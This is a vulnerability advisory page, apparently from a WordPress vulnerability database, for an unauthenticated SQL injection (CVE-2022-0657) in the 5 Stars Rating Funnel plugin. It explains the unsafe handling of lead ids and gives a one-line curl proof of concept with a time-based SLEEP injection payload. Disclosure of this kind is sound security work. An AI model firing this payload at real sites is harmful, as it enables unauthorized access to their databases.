5 Stars Rating Funnel < 1.2.53 – Unauthenticated SQLi | CVE 2022-0657 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input, using sanitize_text_field(), however such function is not intended to prevent SQL injections.

Proof of Concept

Create a new funnel (All Rating Funnels sub-menu)
Create a new lead (Leads / Feedbacks sub-menu)
Invoke the following curl command to trigger a 5 second sleep

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rrtngg_delete_leads&lead_ids[]=(SELECT SLEEP(5))) AND 1=1 #'

Affects Plugins

5-stars-rating-funnel

Fixed in 1.2.53

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

e7fe8218-4ef5-4ef9-9850-8567c207e8e6

Timeline

Publicly Published

2022-03-29 (about 2 years ago)

Added

2022-03-29 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2023-12-21

Title

Booking Manager < 2.1.6 - Authenticated(Contributor+) SQL Injection via Shortcode

Published

2022-01-27

Title

GWA AutoResponder <= 2.3 - Unauthenticated SQL Injection

Published

2021-07-15

Title

Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection

Published

2014-08-01

Title

blogVault 1.05 - admin.php blogVault Key Setting CSRF

Published

2023-01-20

Title

FL3R FeelBox <= 8.1 - Unauthenticated SQLi